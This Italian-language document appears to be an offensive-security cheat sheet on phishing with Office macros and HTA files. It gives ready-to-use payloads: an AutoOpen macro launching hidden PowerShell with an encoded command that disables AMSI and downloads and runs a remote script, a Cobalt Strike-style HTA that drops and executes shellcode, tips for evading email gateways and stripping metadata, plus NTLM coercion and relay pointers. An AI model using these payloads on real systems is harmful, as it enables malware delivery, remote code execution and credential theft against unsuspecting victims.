Documenti di Office

Microsoft Word esegue la convalida dei dati del file prima di aprirlo. La convalida dei dati viene eseguita sotto forma di identificazione della struttura dei dati, rispetto allo standard OfficeOpenXML. Se si verifica un errore durante l'identificazione della struttura dei dati, il file in fase di analisi non verrà aperto.

Di solito, i file di Word contenenti macro utilizzano l'estensione .docm. Tuttavia, è possibile rinominare il file cambiando l'estensione del file e mantenere comunque le capacità di esecuzione delle macro. Ad esempio, un file RTF non supporta le macro, per design, ma un file DOCM rinominato in RTF verrà gestito da Microsoft Word e sarà in grado di eseguire le macro. Gli stessi interni e meccanismi si applicano a tutti i software della suite Microsoft Office (Excel, PowerPoint ecc.).

Puoi utilizzare il seguente comando per verificare quali estensioni verranno eseguite da alcuni programmi di Office:

assoc | findstr /i "word excel powerp"

Caricamento di immagini esterne

Vai a: Inserisci --> Parti rapide --> Campo Categorie: Collegamenti e riferimenti, Nomi dei campi: includePicture, e Nome file o URL: http://<ip>/qualsiasi

Backdoor dei macro

È possibile utilizzare i macro per eseguire codice arbitrario dal documento.

Funzioni di caricamento automatico

Più comuni sono, più probabile è che l'AV li rilevi.

• AutoOpen()

• Document_Open()

Esempi di codice dei macro

Sub AutoOpen()
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
End Sub

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"

End Sub

Dim author As String
author = oWB.BuiltinDocumentProperties("Author")
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
.StdIn.WriteLine author
.StdIn.WriteBlackLines 1

Dim proc As Object
Set proc = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
proc.Create "powershell <beacon line generated>

Rimuovere manualmente i metadati

Vai su File > Informazioni > Ispeziona documento > Ispeziona documento, che aprirà l'Ispezionatore documento. Clicca su Ispeziona e poi su Rimuovi tutto accanto a Proprietà del documento e informazioni personali.

Estensione del documento

Una volta finito, seleziona il menu a tendina Salva come tipo, cambia il formato da .docx a Word 97-2003 .doc. Fallo perché non puoi salvare i macro all'interno di un .docx e c'è uno stigma attorno all'estensione macro abilitata .docm (ad esempio, l'icona miniatura ha un grande ! e alcuni gateway web/email li bloccano completamente). Pertanto, questa estensione legacy .doc è il miglior compromesso.

Generatori di macro maligne

• MacOS

• macphish

• Mythic Macro Generator

File HTA

Un file HTA è un programma Windows che combina HTML e linguaggi di scripting (come VBScript e JScript). Genera l'interfaccia utente ed esegue come un'applicazione "totalmente attendibile", senza i vincoli del modello di sicurezza di un browser.

Un file HTA viene eseguito utilizzando mshta.exe, che è tipicamente installato insieme a Internet Explorer, rendendo mshta dipendente da IE. Quindi, se è stato disinstallato, gli HTA non potranno essere eseguiti.

<--! Basic HTA Execution -->
<html>
<head>
<title>Hello World</title>
</head>
<body>
<h2>Hello World</h2>
<p>This is an HTA...</p>
</body>

<script language="VBScript">
Function Pwn()
Set shell = CreateObject("wscript.Shell")
shell.run "calc"
End Function

Pwn
</script>
</html>

<--! Cobal Strike generated HTA without shellcode -->
<script language="VBScript">
Function var_func()
var_shellcode = "<shellcode>"

Dim var_obj
Set var_obj = CreateObject("Scripting.FileSystemObject")
Dim var_stream
Dim var_tempdir
Dim var_tempexe
Dim var_basedir
Set var_tempdir = var_obj.GetSpecialFolder(2)
var_basedir = var_tempdir & "\" & var_obj.GetTempName()
var_obj.CreateFolder(var_basedir)
var_tempexe = var_basedir & "\" & "evil.exe"
Set var_stream = var_obj.CreateTextFile(var_tempexe, true , false)
For i = 1 to Len(var_shellcode) Step 2
var_stream.Write Chr(CLng("&H" & Mid(var_shellcode,i,2)))
Next
var_stream.Close
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run var_tempexe, 0, true
var_obj.DeleteFile(var_tempexe)
var_obj.DeleteFolder(var_basedir)
End Function

var_func
self.close
</script>

Forzare l'autenticazione NTLM

Ci sono diversi modi per forzare l'autenticazione NTLM "da remoto", ad esempio, è possibile aggiungere immagini invisibili alle email o all'HTML a cui l'utente accederà (anche HTTP MitM?). Oppure inviare alla vittima l'indirizzo dei file che attiveranno un'autenticazione solo per aprire la cartella.

Controlla queste idee e altro nelle pagine seguenti:

NTLM Relay

Non dimenticare che non puoi solo rubare l'hash o l'autenticazione ma anche eseguire attacchi di relay NTLM:

• Attacchi di relay NTLM

• AD CS ESC8 (relay NTLM ai certificati)